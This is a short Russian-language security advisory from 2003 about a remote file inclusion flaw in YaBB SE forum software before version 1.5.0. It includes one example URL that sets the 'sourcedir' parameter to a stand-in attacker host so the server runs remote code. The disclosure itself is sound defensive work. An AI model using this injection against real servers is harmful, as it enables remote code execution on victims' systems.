Security Lab

Выполнение произвольных команд в YaBB SE

Дата публикации:28.01.2003
Всего просмотров:2469
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в YaBB SE – популярном форуме для UNIX и Windows систем. Удаленный атакующий может выполнить произвольный код на уязвимом сервере.

Файл 'Packages.php' включает сценарий 'Packer.php', местоположение которого задается переменной '$sourcedir'. Удаленный атакующий может создать URL, в котором переменная '$sourcedir' ссылается на файл, расположенный на удаленном сервере. Если этот файл содержит команды оболочки, то они будут выполнены на уязвимом сервере с привилегиями Web сервера. Пример:

 
http://[target]/yabbse/Sources/Packages.php?sourcedir=http://attacker/
Уязвимость обнаружена в YaBB SE до версии 1.5.0
Ссылки: YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )